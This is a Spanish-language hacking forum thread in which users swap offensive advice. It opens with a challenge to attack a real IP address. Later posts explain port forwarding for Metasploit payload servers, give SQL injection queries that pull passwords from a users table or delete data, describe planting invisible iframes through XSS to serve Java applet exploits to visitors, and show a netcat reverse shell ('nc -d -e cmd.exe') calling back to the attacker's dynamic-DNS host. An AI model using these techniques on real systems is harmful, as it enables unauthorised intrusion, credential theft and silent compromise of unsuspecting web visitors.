Mensajes

[Vale todo!!!]

Hola muchachos, gusto en saludarlos al foro! Les dejo un desafió para las noches de aburrimiento y cervezas ensima. Vale todo!!!



https://170.210.156.26.

Espero se diviertan.

Saludos

[rudeboy1991]

Hola, resulta que con metasploit cuando quiero usarlo en WAN y tiene la OPCION de SRVHOST, logicamente tengo que poner mi IP Publica, pero al hacer eso, y ya con todas las opciones completadas, a la hora de poner exploit me dice lo siguiente:

[-] Exploit exception: La dirección solicitada no es válida en este contexto. -
bind(2)

Sin embargo en WLAN cuando en SRVHOST solamente tengo que poner IP privada, me funciona de maravillas.


Atte.

Hola rudeboy1991, lo que tenes que hacer es poner tu IP privada ej:
set SRVHOST 192.168.0.100
set SRVPORT 80
Luego tienes q ir a tu router, y abrir el puerto haciendo portforward hacia tu ip privada ( 192.168.0.100 en este ejemplo) que estara escuchando en el 80.
O tambien como dijeron mas arriba colocando a tu IP privada en el DMZ.

Saludos!

PD: Es obvio que tu IP publica no vas a poder poner ya que tu pc no esta menejando esa direccion dando el error correspondiende.

[Escenarios Correctos:]

Buenas, como algunos usuarios recalcarón no se puede realizar Stacked Query en MySQL con PHP, por lo tanto no te puedes salir de esa consulta para apilar una nueva, es imposible usando esas tecnologias por desgracia :p
Ahora si estas dentro de un SELECT puedes inyectar con Subconsultas o con la Clausula UNION

Escenarios Correctos:

Con UNION

SELECT TITULO, CUERPO, FECHA FROM NOTICIAS WHERE ID = 4

INYECCION

SELECT TITULO, CUERPO, FECHA FROM NOTICIAS WHERE ID = -4343 UNION SELECT PASSWORD,USERS,3 FROM USUARIOS

Con SUBCONSULA

SELECT TITULO, CUERPO, FECHA FROM NOTICIAS WHERE ID = 4

SELECT TITULO, CUERPO, FECHA FROM NOTICIAS WHERE ID = 4 AND (SELECT COUNT(*) FROM USERS)

Este tipo de ataques a subconsultas es la la logica de Booleanizacion la cual es la tecnica de Blind SQL.

andres_5 a lo que voy es que no puedes hacer esto en mysql con php

SELECT TITULO, CUERPO, FECHA FROM NOTICIAS WHERE ID = 4; DELETE * FROM USUARIOS

No se permiten stacked query, dejo una imagen donde muestra los esenarios donde se soporta y donde no.




Saludos

Me voy a descargar averno, x que la q tengo es mas vieja y lo pruebo, Gracias por tu tiempo de codear y publicarlo.!!!

Un abrazo

[darko666]

Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!
WTF!...

?????????.. en que momento darko666 hablo  de algun BOF!!! no se si lo leiste bien Alex@ShellRoot, o solo peudes hacer copy and paste.!!
El esta realizando con JavaApplet, tranquilamente puedes colocar un iframe oculto, en alguna web que tengas acceso o algun XSS.. de la forma.. Supongamos que nuestro java se esta ejecutando en una http://IP-PUBLICA con el metasploit, entonces quedaria asi:

Código (html4strict) [Seleccionar] Expandir

<iframe src="http://IP-PUBLICA "frameborder=0 width=0 height=0></iframe>

Saludos

[darko666]

Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!

[thunder_Godhack]

Hola thunder_Godhack , como estas? no se de donde sacaste que no puede rootear un servidor con IP dinamica, aver podria llegar a pasar que justo cuando vos estas conectado con el server tu IP cambie en un momento dado, pero eso pasarias si reiniciars el router o justo tu ISP lo haga, nosotros ruteamos con ARNET (Argentina) y nunca hubo problema.
Lo que te recomiendo es que uses algun servicio como el No-IP, lo que hara esto es corrrer un proceso en tu SO, donde va actualizando la ip cada un instante de tiempo, asi que si cambias en ese momento dado el NO-IP se encargara de que actualizes.. Entonces tendrias que rutear de esta forma, ejemplo con netcat.

nc -d -e cmd.exe Mi-no-IP puerto


Saludos

Si bro tienes razon, eso tengo q corregir. Igual vos ya me tiraste el dato el otro dia , ahora ando apretado con la facu..

Saludos Gracias!!

Drama es igual a problema! que no tengo problema en que migres.. Es mas mejor para todos si lo migras. Tengo pensado seguir agregandole mas cosillas despues..

Saludos bro

Si no hay drama... Migrala y publica el codigo.!!

Saludos..